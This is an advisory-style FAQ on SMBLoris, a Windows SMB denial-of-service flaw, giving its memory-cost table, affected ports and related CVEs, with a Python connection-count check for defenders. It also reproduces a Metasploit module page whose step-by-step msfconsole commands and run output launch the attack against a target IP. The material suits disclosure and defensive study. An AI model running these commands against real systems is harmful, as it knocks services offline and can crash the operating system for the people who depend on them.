What is SMBLoris?
SMBLoris is a remote and uncredentialed denial of service attack against Microsoft® Windows® operating systems, caused by a 20+ year old vulnerability in the Server Message Block (SMB) network protocol implementation.
What versions of Windows are affected?
The vulnerability is in all modern versions of Windows, at least from Windows 2000 through Windows 10. Systems are still vulnerable even if all versions of SMB (1, 2, and 3) are disabled.
What is the threat?
It is computationally inexpensive for an attacker to cause large memory allocations and enormous amounts of wasted CPU cycles†, rendering vulnerable machines completely unusable, making business-critical services (such as web and mail servers) unavailable, and even causing the entire operating system to crash.
| Scenario | Sockets | Attack Cost‡ | Memory Impact |
|---|---|---|---|
| Baseline | 1 | 4 bytes | 128 KiB |
| Single IPv4 | 65,535 | 256 KiB | 8 GiB |
| Single IPv6 | 65,535 | 256 KiB | 8 GiB |
| Dual IPv4 / IPv6 | 131,070 | 512 KiB | 16 GiB |
| 10 IPs | 655,535 | 2.5 MiB | 80 GiB |
† CPU impact cannot be meaningfully measured, but is generally quite significant.
‡ Attack cost is measured by how many bytes of TCP data an attacker must send over the network.
It does not include standard network headers, which add only a small overhead for the attacker.
Is there a CVE?
SMBLoris has not (yet?) been assigned a CVE. Some similar vulnerabilities include:
CVE-2012-5568
MS09-048 (CVE-2009-1925 and CVE-2009-1926)
CVE-2008-4609
CVE-2007-6750
Is there a patch?
Not at this time.
What ports are affected?
Generally, SMB runs on port 445. The NetBIOS service on port 139 is probably also exploitable.
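A defender-side check that follows from the table and port list above, as an added example (not part of the original post or of the Metasploit module): it counts established connections per remote address on ports 445 and 139 in `netstat -an` style output and estimates the memory they hold, using the table's baseline of 128 KiB per socket. The alert threshold, the function names and the sample rows are assumptions constructed for illustration.

```python
from collections import Counter

SMB_PORTS = {139, 445}    # ports the page names as affected
KIB_PER_SOCKET = 128      # table baseline: 1 socket -> 128 KiB
THRESHOLD = 100           # assumed alert threshold; tune per environment


def parse_row(line):
    """Return (local_port, remote_ip, state) for a TCP row, else None."""
    fields = line.split()
    if len(fields) != 4 or fields[0].upper() != "TCP":
        return None
    try:
        local_port = int(fields[1].rsplit(":", 1)[1])
    except (IndexError, ValueError):
        return None
    # rsplit keeps bracketed IPv6 addresses such as [2001:db8::21] intact
    remote_ip = fields[2].rsplit(":", 1)[0].strip("[]")
    return local_port, remote_ip, fields[3].upper()


def smb_connection_report(netstat_text, threshold=THRESHOLD):
    """List remote addresses holding >= threshold SMB/NetBIOS sockets."""
    counts = Counter()
    for line in netstat_text.splitlines():
        row = parse_row(line)
        if row and row[0] in SMB_PORTS and row[2] == "ESTABLISHED":
            counts[row[1]] += 1
    return [
        {"source": ip, "sockets": n, "est_kib": n * KIB_PER_SOCKET}
        for ip, n in counts.most_common()
        if n >= threshold
    ]


def constructed_sample():
    """Constructed rows: a listener, three ordinary peers, one address with 4096 sockets."""
    rows = [
        "  TCP    0.0.0.0:445         0.0.0.0:0              LISTENING",
        "  TCP    10.0.0.5:445        10.0.0.21:50122        ESTABLISHED",
        "  TCP    10.0.0.5:3389       10.0.0.30:50999        ESTABLISHED",
        "  TCP    [2001:db8::5]:445   [2001:db8::21]:50123   ESTABLISHED",
    ]
    rows += [f"  TCP    10.0.0.5:445        203.0.113.9:{port}      ESTABLISHED"
             for port in range(1025, 1025 + 4096)]
    return "\n".join(rows)


if __name__ == "__main__":
    for hit in smb_connection_report(constructed_sample()):
        print(f"{hit['source']}: {hit['sockets']} sockets, "
              f"~{hit['est_kib'] // 1024} MiB estimated")
```

Since no patch is available, the same per-source count is a natural basis for a connection-rate limit on ports 445 and 139 at the host or perimeter firewall.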
auxiliary/dos/smb/smb_loris Metasploit Module
This module exploits a vulnerability in the NetBIOS Session Service Header for SMB.
Any Windows machine with SMB exposed, or any Linux system running Samba, is vulnerable.
See the SMBLoris page for details on the vulnerability.
The module opens over 64,000 connections to the target service, so please make sure
your system ULIMIT is set appropriately to handle it. A single host running this module
can theoretically consume up to 8GB of memory on the target.
Verification Steps
1. Start msfconsole
2. Do: use auxiliary/dos/smb/smb_loris
3. Do: set RHOST [IP]
4. Do: run
5. Target should allocate increasing amounts of memory.
msf auxiliary(smb_loris) > use auxiliary/dos/smb/smb_loris
msf auxiliary(smb_loris) > set RHOST 192.168.172.138
RHOST => 192.168.172.138
msf auxiliary(smb_loris) >
msf auxiliary(smb_loris) > run
[*] 192.168.172.138:445 - Sending packet from Source Port: 1025
[*] 192.168.172.138:445 - Sending packet from Source Port: 1026
[*] 192.168.172.138:445 - Sending packet from Source Port: 1027
[*] 192.168.172.138:445 - Sending packet from Source Port: 1028
[*] 192.168.172.138:445 - Sending packet from Source Port: 1029
[*] 192.168.172.138:445 - Sending packet from Source Port: 1030
[*] 192.168.172.138:445 - Sending packet from Source Port: 1031
[*] 192.168.172.138:445 - Sending packet from Source Port: 1032
[*] 192.168.172.138:445 - Sending packet from Source Port: 1033
….
Source: Github